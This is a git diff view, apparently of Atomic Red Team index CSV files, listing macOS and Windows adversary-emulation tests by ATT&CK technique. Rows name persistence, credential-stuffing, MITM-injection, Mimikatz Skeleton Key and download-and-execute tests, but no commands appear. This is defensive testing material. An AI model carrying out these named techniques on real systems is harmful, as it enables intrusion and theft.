persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
@@ -114,8 +114,6 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
@@ -128,7 +126,6 @@ persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
@@ -184,8 +181,6 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
@@ -226,8 +221,6 @@ credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spo
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
@@ -237,7 +230,6 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtu
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
@@ -256,8 +248,7 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,8,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
@@ -290,7 +281,6 @@ impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
12 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 13 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
13 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 1 Decode Eicar File and Write to File 7693ccaa-8d64-4043-92a5-a2eb70359535 powershell
14 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 2 Decrypt Eicar File and Write to File b404caaa-12ce-43c7-9214-62a531c044f7 powershell
defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 3 Password-Protected ZIP Payload Extraction and Execution c2ca068a-eb1e-498f-9f93-3d554c455916 bash
15 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
16 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
17 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
94 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
95 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
96 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
97 persistence T1176 Browser Extensions 2 Firefox Chrome/Chromium (Chrome Web Store) cb790029-17e6-4c43-b96f-002ce5f10938 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
98 persistence T1176 Browser Extensions 3 Edge Chromium Addon - VPN Firefox 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 cb790029-17e6-4c43-b96f-002ce5f10938 manual
99 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
100 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
101 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
102 persistence T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
114 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
115 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
116 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 4 Python Startup Hook - atomic_hook.pth (macOS) 28ca4f81-fa96-47ff-8555-dde98017e89b sh
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 5 Python Startup Hook - usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8 sh
117 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
118 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
119 persistence T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
126 persistence T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
127 persistence T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
128 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
command-and-control T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
129 command-and-control T1572 Protocol Tunneling 5 Microsoft Dev tunnels (Linux/macOS) 9f94a112-1ce2-464d-a63b-83c1f465f801 bash
130 command-and-control T1572 Protocol Tunneling 6 VSCode tunnels (Linux/macOS) b877943f-0377-44f4-8477-f79db7f07c4d sh
131 command-and-control T1572 Protocol Tunneling 7 Cloudflare tunnels (Linux/macOS) 228c336a-2f79-4043-8aef-bfa453a611d5 sh
181 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
182 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
183 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 4 Python Startup Hook - atomic_hook.pth (macOS) 28ca4f81-fa96-47ff-8555-dde98017e89b sh
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 5 Python Startup Hook - usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8 sh
184 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
185 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
186 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
221 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
222 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
223 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 2 Check internet connection using ping freebsd, linux or macos be8f4019-d8b6-434c-a814-53123cdcc11e bash
discovery T1652 Device Driver Discovery 4 List loaded kernel extensions (macOS) 71eab73d-5d7d-4681-9a72-7873489a5b85 bash
discovery T1652 Device Driver Discovery 5 Find Kernel Extensions (macOS) c63bbe52-6f17-4832-b221-f07ba8b1736f bash
224 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
225 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
226 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
230 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 6 Detect Virtualization Environment using sysctl (hw.model) 6beae646-eb4c-4730-95be-691a4094408c sh
231 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 7 Check if System Integrity Protection is enabled 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 sh
232 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 8 Detect Virtualization Environment using system_profiler e04d2e89-de15-4d90-92f9-a335c7337f0f sh
discovery T1007 System Service Discovery 5 System Service Discovery - macOS launchctl 9b378962-a75e-4856-b117-2503d6dcebba sh
233 discovery T1040 Network Sniffing 3 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
234 discovery T1040 Network Sniffing 8 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
235 discovery T1040 Network Sniffing 9 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
248 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
249 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
250 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
251 discovery T1049 System Network Connections Discovery 4 3 System Network Connections Discovery via ss or lsof (Linux/MacOS) System Network Connections Discovery FreeBSD, Linux & MacOS bcf05343-ef1d-4052-8a27-b00c9be42b9f 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 bash sh
discovery T1049 System Network Connections Discovery 5 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
252 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
253 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
254 discovery T1201 Password Policy Discovery 8 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
281 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - FreeBSD/macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb sh
282 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - FreeBSD/macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de sh
283 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - FreeBSD/macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 sh
initial-access T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
284 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
285 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
286 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
atomics/Indexes/Indexes-CSV/windows-index.csv
+5 -27
View File
@@ -394,7 +394,6 @@ defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in Po
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,11,Obfuscated PowerShell Command via Character Array,6683baf0-6e77-4f58-b114-814184ea8150,powershell
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
@@ -428,7 +427,6 @@ defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -651,8 +649,6 @@ privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
@@ -812,14 +808,10 @@ persistence,T1556.002,Modify Authentication Process: Password Filter DLL,2,Insta
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -1003,15 +995,12 @@ persistence,T1546.015,Event Triggered Execution: Component Object Model Hijackin
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
@@ -1045,7 +1034,6 @@ command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
command-and-control,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1101,7 +1089,6 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,12,Copy and Com
